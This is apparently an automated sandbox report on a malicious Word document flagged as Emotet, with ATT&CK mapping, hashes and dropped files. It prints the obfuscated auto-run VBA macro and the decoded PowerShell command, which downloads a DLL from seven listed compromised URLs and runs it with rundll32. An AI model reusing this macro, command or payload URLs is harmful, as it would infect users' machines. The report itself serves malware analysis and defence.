Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Valid Accounts | Command and Scripting Interpreter 111 | Path Interception | Process Injection 11 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Ingress Tool Transfer 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scripting 12 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Junk Data | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | PowerShell 1 | Logon Script (Mac) | Logon Script (Mac) | Process Injection 11 | NTDS | File and Directory Discovery 2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 11 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Scripting 12 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

Behavior Graph



Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
--- | --- | --- | ---
1711.doc | 40% | Virustotal |
1711.doc | 20% | Metadefender |
1711.doc | 58% | ReversingLabs | Document-Word.Trojan.Emotet

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs


Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries


Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 526179
Start date: 22.11.2021
Start time: 10:54:26
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 0s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: 1711.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 6
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal84.expl.winDOC@5/13@0/0
EGA Information: Failed
HDC Information: Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 1
  • Number of non-executed functions: 1
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
  • Execution Graph export aborted for target powershell.exe, PID 2840 because it is empty
  • Not all processes were analyzed; the report is missing behavior information
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

Time | Type | Description
--- | --- | ---
10:54:22 | API Interceptor | 55x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4114E8B1.png
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: PNG image data, 1127 x 490, 8-bit/color RGB, non-interlaced
Category: dropped
Size (bytes): 121507
Entropy (8bit): 7.978393301250379
Encrypted: false
SSDEEP: 3072:oXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqc:oXw50+OukzVXV2uhDj
MD5: D3C11BC087FAF4372F4C5D37E06FCFFD
SHA1: 40A9FE4D47DADFDB1463D63F14D6D60641AC19E5
SHA-256: 6F49F13CEF0667A75A3E55767CD769F476EB3FF400BDA8CB3FBF47BA8B0A7077
SHA-512: C50363E3CA99B4537A8BA625D84CD0A8C2E8FB15D1FF0163E967D3536E373F3449EB4489EC117766D78B1386D60192453FAE8C372119E32D98E58B07844216EB
Malicious: false
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E3844549-3F78-457B-BAEF-06FBD2156752}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 41984
Entropy (8bit): 5.383636719226494
Encrypted: false
SSDEEP: 768:In/plLQxx12HtK6z0D4J/pFLQxx12HtK6z0D:KlLQxx12HtK6z0UFLQxx12HtK6z0
MD5: 630161A7185DCB458C3A526CCD969ABB
SHA1: 9A9AFEAE4A07A818F707C584B29323335F508FCD
SHA-256: 4D9F1733C0B90882E54B3A36271659D8F3DA895A9A6E26FD130DA1F14A91964D
SHA-512: 92099AAF7E64C63C2A4678669F0367B10D0D474E8F710D22D0428D501D5C3FA3578D9602633E3235E0E1CD9A631B7EFDE12898EA5937176006C70723A37A7B44
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{31697AE2-9911-46AE-855C-FC6F84C9E570}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1536
Entropy (8bit): 1.6413622548786062
Encrypted: false
SSDEEP: 6:rlEPgsn1F1YsuTyavlEtSYd9XwY2sQmh5epe8P+7WAeSTBFXZSuIehx:ePLF10yWEtSYW9oH8JAeOBBZSmX
MD5: 91473136D20E3046BECA18C78CE9BBE7
SHA1: 014B29FADC9F1EB72ADEBAB7A157BF9789953462
SHA-256: 7A57B63B9EB2FA46EC6C49F9D792DE64710966EA99730E6B18702F49D988A15F
SHA-512: 4ABA8620775E931315BAE02D9F3C72188413831342C1BC67EC1F5C0FD37D0F662ABD04EBED5D3613CB8BAC159B87457BB87FCF4E6992262ABE4981B95EAAE5A0
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{52852A70-A935-4D7F-A270-7FCD1CA48619}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 1024
Entropy (8bit): 0.05390218305374581
Encrypted: false
SSDEEP: 3:ol3lYdn:4Wn
MD5: 5D4D94EE7E06BBB0AF9584119797B23A
SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512: 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious: false
Reputation: high, very likely benign file
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A4608109-7EE5-416E-A16B-050D4F8625B8}.tmp
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 2
Entropy (8bit): 1.0
Encrypted: false
SSDEEP: 3:X:X
MD5: 32649384730B2D61C9E79D46DE589115
SHA1: 053D8D6CEEBA9453C97D0EE5374DB863E6F77AD4
SHA-256: E545D395BB3FD971F91BF9A2B6722831DF704EFAE6C1AA9DA0989ED0970B77BB
SHA-512: A4944ADFCB670ECD1A320FF126E7DBC7FC8CC4D5E73696D43C404E1C9BB5F228CF8A6EC1E9B1820709AD6D4D28093B7020B1B2578FDBC764287F86F888C07D9C
Malicious: false
Reputation: high, very likely benign file
Preview: ..
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 147284
Entropy (8bit): 4.421624942731045
Encrypted: false
SSDEEP: 1536:C8yL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcmB:CZJNSc83tKBAvQVCgOtmXmLpLmB
MD5: 62946DD1D4369B40AB7C43FFE49306F1
SHA1: D820412F0CEFF346B60691EC53B0CFEC545240A0
SHA-256: 574017A6CD6121E24117AA16750044E473BEAB038466C6FC53FF50B7222BD78D
SHA-512: E9C30A2DAB18805A3DD2A4C7AB8B175DB85713430A3BC1EF148D492A43154F1A3F033D40E4CEEAA2E9B81A0E3C24E4BF5C9FC63E9C9DBC46ADDF45A3AEB11F6C
Malicious: false
Reputation: low
C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: Composite Document File V2 Document, Cannot read section info
Category: dropped
Size (bytes): 55808
Entropy (8bit): 4.7353560135116135
Encrypted: false
SSDEEP: 1536:z7ohjy3K6eGum/Cnps39t0UtXJTpzmFlZD:whjya6eGum/Cny1JTpz0H
MD5: 44F9CCBE595FE1B7BFD3E2A1140C56A0
SHA1: C49C1A9814569DC6E95F87157A16D243DEA160A3
SHA-256: 318F746A4626DF1CE5F62D174620751B0418E7FFA7F847FFBBADB5433D096EE0
SHA-512: 24892FC86719306BBA3ABBE52DF64B77AD32ECD94DEC55A75AD54CD80C80A61E4C4C703135C7F7B83D16B58E820BC2ABC207BFE198F3506B744BEAAD39DE287B
Malicious: false
Yara Hits:
  • Rule: SUSP_VBA_FileSystem_Access, Description: Detects suspicious VBA that writes to disk and is activated on document open, Source: C:\Users\user\AppData\Local\Temp\~DFF0F57547FC904286.TMP, Author: Florian Roth
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1711.LNK
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:57 2021, mtime=Mon Aug 30 20:08:57 2021, atime=Mon Nov 22 17:54:15 2021, length=135948, window=hide
Category: dropped
Size (bytes): 980
Entropy (8bit): 4.477890004940672
Encrypted: false
SSDEEP: 12:8iW1gXg/XAlCPCHaXeBhB/OW9qX+WfY0tcPgicvb6MZUnDtZ3YilMMEpxRljKico:8ia/XTuzLI5YDeGMZ0Dv3qoQd7Qy
MD5: 1B2D29FE46309EB73F25961FA46345B9
SHA1: 38C4DD45673A3E5091D0BBE04F980A6A3089FBA9
SHA-256: C583E5FF8FFC2C220BCC2F3F794EE2274B67E82F26165F28F6A152BDE458E72C
SHA-512: E51CA5E2D222DF2F28DA05F78E3166846332AF27DF8E4AF314CCD35569B5311DC5D1910B522BDA82AF67422ACBC78C5B782F5BFD87BFE7626A922A78AD3312CF
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 59
Entropy (8bit): 4.424791041423791
Encrypted: false
SSDEEP: 3:bDuMJlYUdruYCmX1USXruYCv:bCs2Ms
MD5: 38B1B69A7D2D3E1C386BC4E37CB0A52B
SHA1: F761BA2E5930369A2AE6B055664B1E06E53E3646
SHA-256: EE6611A14ABADA654761586768A652637235A616AF1030FD8BC52EA555FFF18C
SHA-512: CA698A65875D0DBAFBA21E6384ED97672BCFDBA0C20BA92EFF147139B938412D393C14A6F46C6BE13AC2F4DD0314F57C7BDF7DF76544D4269207234AA3874FFF
Malicious: false
Preview: [folders]..Templates.LNK=0..1711.LNK=0..[doc]..1711.LNK=0..
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: false
Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2ZU8F0KC83087BZI92TF.temp
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5819683626894125
Encrypted: false
SSDEEP: 96:chQCQMqKqvsqvJCwo6z8hQCQMqKqvsEHyqvJCworIzdTYnHBF2MGlUVkA2:cWzo6z8WnHnorIzdsF2MSA2
MD5: 9F246B20B682C6FDB9E7E0679D09DE37
SHA1: CFB8A7BF38F60314C5D1A5135F0C9B024435F4A9
SHA-256: 1D828DE626EBBA11C829D965E10058C8DC839AA14EE991786034ED340B7DCDD6
SHA-512: 0BA10B567653CAA3C5E438290B9D97FC9FBE20EFDC8D679891C4798DD00E24BB9D83119423F8FF0C8C169BD352F6A7A67A450989ED5706E5051B2EFBEEFB9FF1
Malicious: false
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msa (copy)
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 8016
Entropy (8bit): 3.5819683626894125
Encrypted: false
SSDEEP: 96:chQCQMqKqvsqvJCwo6z8hQCQMqKqvsEHyqvJCworIzdTYnHBF2MGlUVkA2:cWzo6z8WnHnorIzdsF2MSA2
MD5: 9F246B20B682C6FDB9E7E0679D09DE37
SHA1: CFB8A7BF38F60314C5D1A5135F0C9B024435F4A9
SHA-256: 1D828DE626EBBA11C829D965E10058C8DC839AA14EE991786034ED340B7DCDD6
SHA-512: 0BA10B567653CAA3C5E438290B9D97FC9FBE20EFDC8D679891C4798DD00E24BB9D83119423F8FF0C8C169BD352F6A7A67A450989ED5706E5051B2EFBEEFB9FF1
Malicious: false
C:\Users\user\Desktop\~$1711.doc
Process: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 162
Entropy (8bit): 2.5038355507075254
Encrypted: false
SSDEEP: 3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
MD5: 45B1E2B14BE6C1EFC217DCE28709F72D
SHA1: 64E3E91D6557D176776A498CF0776BE3679F13C3
SHA-256: 508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
SHA-512: 2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
Malicious: true
Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

Static File Info

General

File type: Microsoft Word 2007+
Entropy (8bit): 7.953932715889731
TrID:
  • Word Microsoft Office Open XML Format document with Macro (52004/1) 33.99%
  • Word Microsoft Office Open XML Format document (49504/1) 32.35%
  • Word Microsoft Office Open XML Format document (43504/1) 28.43%
  • ZIP compressed archive (8000/1) 5.23%
File name: 1711.doc
File size: 145337
MD5: 85ab297345c97bca1a5004dc537f6c1c
SHA1: 0b609d0b86f1b29410451306c173c7fac013d5a7
SHA256: 31daa06dc4c4f5dda5e557e8422d9b31655b1322e610bb42096a2a060727927d
SHA512: c5f246b510db5ba25b29338a5fc1182ac56738be51ebc6c8f5fb0e004a5b42e61fe69a304efcd5e000382609f1f524f329bd41322b5e5f67a986deea40cd4ec6
SSDEEP: 3072:hwQhXwhJd0+y7ukYe4uYum1GdgOpVXGuhCUqDK3CXV:yeXw50+OukzVXV2uhDCxXV
File Content Preview: PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash: e4eea2aaa4b4b4a4

    Static OLE Info

    General

    Document Type:OpenXML
    Number of OLE Files:1

    OLE File "/opt/package/joesandbox/database/analysis/526179/sample/1711.doc"

    Indicators

    Has Summary Info:False
    Application Name:unknown
    Encrypted Document:False
    Contains Word Document Stream:
    Contains Workbook/Book Stream:
    Contains PowerPoint Document Stream:
    Contains Visio Document Stream:
    Contains ObjectPool Stream:
    Flash Objects Count:
    Contains VBA Macros:True

    Summary

    Author:1
    Template:Normal.dotm
    Last Saved By:1
    Revision Number:39
    Total Edit Time:144
    Create Time:2021-11-15T15:39:00Z
    Last Saved Time:2021-11-16T19:13:00Z
    Number of Pages:1
    Number of Words:9
    Number of Characters:53
    Creating Application:Microsoft Office Word
    Security:0

    Document Summary

    Number of Lines:1
    Number of Paragraphs:1
    Thumbnail Scaling Desired:false
    Company:
    Contains Dirty Links:false
    Shared Document:false
    Changed Hyperlinks:false
    Application Version:12.0000

    Streams with VBA

    VBA File Name: bvkaeiku2ncoi2uho3ihdes.cls, Stream Size: 9859
    General
    Stream Path:VBA/bvkaeiku2ncoi2uho3ihdes
    VBA File Name:bvkaeiku2ncoi2uho3ihdes.cls
    Stream Size:9859
    VBA Code
    Attribute VB_Name = "bvkaeiku2ncoi2uho3ihdes"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Sub tgkauegriu3gkaiusdgfaig3eirgaoiw3rgfoaisdgefig()
        On Error Resume Next: Err.Clear
        InvoiceFolder$ = GetFolder(1, , "(look)")
        If InvoiceFolder$ = "" Then MsgBox "", vbCritical, "": Exit Sub
        ArchieveFolder$ = GetFolder(2, , ",")
        If ArchieveFolder$ = "" Then MsgBox ",", vbCritical, ",": Exit Sub
        Dim coll As Collection
        Set coll = FilenamesCollection(InvoiceFolder$, "?????? ?*??*.xls*", 1)
        If coll.Count = 0 Then
            MsgBox "" & vbNewLine & InvoiceFolder$, vbExclamation, ""
            Exit Sub
        End If
        Dim pi As New ProgressIndicator: pi.Show "", , 2
        pi.StartNewAction , , , , , coll.Count
        Dim WB As Workbook, sh As Worksheet, ra As Range
        Application.ScreenUpdating = False
        For Each FileName In coll
            pi.SubAction "$index $count", ":" & Dir(FileName), "$time"
            pi.Log ":" & Dir(FileName)
            Set WB = Nothing: Set WB = Workbooks.Open(FileName, False, True)
            If WB Is Nothing Then
                pi.Log vbTab & "."
            Else
                Set sh = WB.Worksheets(1)
                Set ra = sh.Range(sh.Range("b1"), sh.Range("b" & sh.Rows.Count).End(xlUp))
                shb.Range("a" & shb.Rows.Count).End(xlUp).Offset(1).Resize(, ra.Rows.Count).Value = Application.WorksheetFunction.Transpose(ra.Value)
                WB.Close False: DoEvents
                pi.Log vbTab & "."
                Name FileName As ArchieveFolder$ & Dir(FileName, vbNormal)
            End If
        Next
        pi.Hide: DoEvents: Application.ScreenUpdating = True
        MsgBox "", vbInformation
    End Sub
    Sub gdekkefh32yeyf8tasf8gqw8dgfiaxdbaflpo3pt23hf()
        On Error Resume Next: Err.Clear
        folder_1$ = GetFolder(1, , "")
        If folder_1$ = "" Then Exit Sub
        folder_2$ = GetFolder(2, , , folder_1$)
        If folder_2$ = "" Then Exit Sub
        folder_3$ = GetFolder(, True, "")
        If folder_3$ = "" Then Exit Sub
    End Sub
    Sub dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf(nfkl34 As String, ndr54 As Long, bvret As Long)
        Dim s1, s2, ra, glew, hkqwfsadesf, st As String
        Dim d, R As Double
        s2 = "DaIcDaImd.DaIeDaIxe DaI/DaIc sDaItaDaIrt /DaIB poDaIwDaIerDaIshDaIelDaIl $dDaIfkj=""$DaIstDaIrs=\""hDaItDaItp:DaI/DaI/thepilaDaItesstudionj.cDaIom/DaIwp-contDaIent/oAx5UoQmIX3cbw/,hDaItDaItp:DaI/DaI/alfaoDaIfarms.coDaIm/xcyav/F9le301G89W0s2g4jLO5/,htDaItpDaIs:DaI/DaI/stDaIaviancjs.cDaIom/wpDaI-foDaIrum/QOm4n2/,DaIhtDaItpDaIs:DaI/DaI/yougaDaIndan.cDaIom/bacDaIkup_YDaIouGaDaIndan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,htDaItDaIp:DaI/DaI/alfadaDaIndoinc.cDaIom/67oyp/C2J2KyCpQnkK4Um/,hDaItDaItp:DaI/DaI/wDaIwDaIw.caboDaIturnup.cDaIom/wDaIp-contDaIent/pluDaIgins/clDaIassic-edDaIitor/js/PZgllRH6QtkaCKtSB50rzr/,htDaItDaIp:/DaI/iDaItoDaImsysDaItem.iDaIn/i9eg3y/nNxmmn9aTcv/\"".SDaIplDaIit(\""DaI,DaI\"");fDaIoDaIreacDaIh($DaIst iDaIn "
        Dim fs As Integer
        Set service = CreateObject("Wsc" + s1 + "ript.She" & "ll")
        s2 = s2 + "$DaIstrDaIs){DaI$r1=GDaIet-RDaIandDaIom;$DaIr2=GDaIeDaIt-RDaIandDaIom;DaI$tpDaIth=\""DaICDaI:DaI\PDaIroDaIgramDDaIata\\\""+DaI$rDaI1+\"".DaIdDaIll\""DaI;IDaInDaIvoDaIke-WDaIebDaIReDaIqueDaIst -DaIUrDaIi $sDaIt -ODaIutFDaIilDaIe $tptDaIh;iDaIf(TDaIeDaIst-DaIPatDaIh DaI$tpDaIth){$DaIfDaIp=DaI\""DaIC:DaI\DaIWiDaIndDaIowDaIs\SDaIysDaIWDaIow6DaI4\rDaIuDaIndlDaIl3DaI2.eDaIxDaIe\"";$DaIa=DaI$tDaIptDaIh+DaI\"",DaIf\""+DaI$DaIr2;SDaItDaIaDaIrt-DaIProcDaIess $fDaIp -DaIArgDaIumeDaIntLDaIist DaI$aDaI;bDaIrDaIeak;}};"";DaIIEXDaI $dDaIfkj"
        If d <> 0.123456 Then
        ra = Replace(s2, "DaI", "")
        End If
        service.Run ra, 0
    End Sub
    Sub fhowi34hotaildovgjuspozao3ethao4wthihegf()
        folder$ = GetFolder()
        If folder$ = "" Then Exit Sub
        MsgBox ":" & folder$, vbInformation
    End Sub
    Private Sub Document_Open()
        Dim dfjrqlwihjpqwof As String
        dgfjalfhkaugwikgfuol3wgnacoi3u5taboi3ut5roai3u5go3wugaolisdrgfso8i7wejwdoljgf "sd", 0, 0
        If fojn = "afqowihro3ihoqew df" Then
            fjl = "gks; kr4;"
            MsgBox fjl
        End If
    End Sub
    Sub dgfhoswihetaoihegaosoaihcbi()
        On Error Resume Next: GetFolder , True
    End Sub
    Function bcbcmbvbvch3h2yg3u5i4tyirugiu(Optional ByVal FolderIndex& = 0, Optional ByVal ShowDialog As Boolean = False, Optional ByVal Title$ = "", Optional ByVal InitialFolder$) As String
        On Error Resume Next: Err.Clear
        ProjectName$ = IIf(Len(PROJECT_NAME$) > 0, PROJECT_NAME$, ",")
        PreviousFolder$ = GetSetting(Application.Name, ProjectName$, "folder" & FolderIndex&, "")
        If Len(PreviousFolder$) > 0 And Not ShowDialog Then
            If Dir(PreviousFolder$, vbDirectory) <> "" Then GetFolder = PreviousFolder$: Exit Function
        End If
        If InitialFolder$ = "" Then
            If Len(PreviousFolder$) > 0 And Dir(PreviousFolder$, vbDirectory) <> "" Then
                InitialFolder$ = PreviousFolder$
            Else
                InitialFolder$ = ThisWorkbook.Path & "\"
            End If
        End If
        With Application.FileDialog(msoFileDialogFolderPicker)
            .ButtonName = "": .Title = Title: .InitialFileName = InitialFolder$
            If .Show <> -1 Then Exit Function
            GetFolder = .SelectedItems(1)
            If Not Right$(GetFolder, 1) = "\" Then GetFolder = GetFolder & "\"
            SaveSetting Application.Name, ProjectName$, "folder" & FolderIndex&, GetFolder
        End With
    End Function

    Streams

    Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521
    General
    Stream Path:PROJECT
    File Type:ASCII text, with CRLF line terminators
    Stream Size:521
    Entropy:5.22231541281
    Base64 Encoded:True
    Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = b v k a e i k u 2 n c o i 2 u h o 3 i h d e s / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . H e l p F i l e = " " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 5 F 5 D F 3 5 6 0 D E A 6 8 E E 6 8 E E 6 C F 2 6 C F 2 " . . D
    Stream Path: PROJECTwm, File Type: data, Stream Size: 74
    General
    Stream Path:PROJECTwm
    File Type:data
    Stream Size:74
    Entropy:3.31599778695
    Base64 Encoded:False
    Data ASCII:b v k a e i k u 2 n c o i 2 u h o 3 i h d e s . b . v . k . a . e . i . k . u . 2 . n . c . o . i . 2 . u . h . o . 3 . i . h . d . e . s . . . . .
    Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4778
    General
    Stream Path:VBA/_VBA_PROJECT
    File Type:data
    Stream Size:4778
    Entropy:4.85191198027
    Base64 Encoded:False
    Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
    Stream Path: VBA/dir, File Type: data, Stream Size: 841
    General
    Stream Path:VBA/dir
    File Type:data
    Stream Size:841
    Entropy:6.48895457492
    Base64 Encoded:True
    Data ASCII:. E . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . o . . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . N c .

    Network Behavior

    No network behavior found

    Code Manipulations

    Statistics

    CPU Usage

    Memory Usage

    High Level Behavior Distribution

    Behavior

    System Behavior

    General

    Start time:10:54:15
    Start date:22/11/2021
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13fad0000
    File size:1423704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high

    General

    Start time:10:54:20
    Start date:22/11/2021
    Path:C:\Windows\System32\cmd.exe
    Wow64 process (32bit):false
    Commandline:"C:\Windows\System32\cmd.exe" /c start /B powershell $dfkj="$strs=\"http://thepilatesstudionj.com/wp-content/oAx5UoQmIX3cbw/,http://alfaofarms.com/xcyav/F9le301G89W0s2g4jLO5/,https://staviancjs.com/wp-forum/QOm4n2/,https://yougandan.com/backup_YouGandan-9th-nov/3n6PrcuIaPCNcRU7uj7D/,http://alfadandoinc.com/67oyp/C2J2KyCpQnkK4Um/,http://www.caboturnup.com/wp-content/plugins/classic-editor/js/PZgllRH6QtkaCKtSB50rzr/,http://itomsystem.in/i9eg3y/nNxmmn9aTcv/\".Split(\",\");foreach($st in $strs){$r1=Get-Random;$r2=Get-Random;$tpth=\"C:\ProgramData\\\"+$r1+\".dll\";Invoke-WebRequest -Uri $st -OutFile $tpth;if(Test-Path $tpth){$fp=\"C:\Windows\SysWow64\rundll32.exe\";$a=$tpth+\",f\"+$r2;Start-Process $fp -ArgumentList $a;break;}};";IEX $dfkj
    Imagebase:0x4ab10000
    File size:345088 bytes
    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
    Has elevated privileges:true
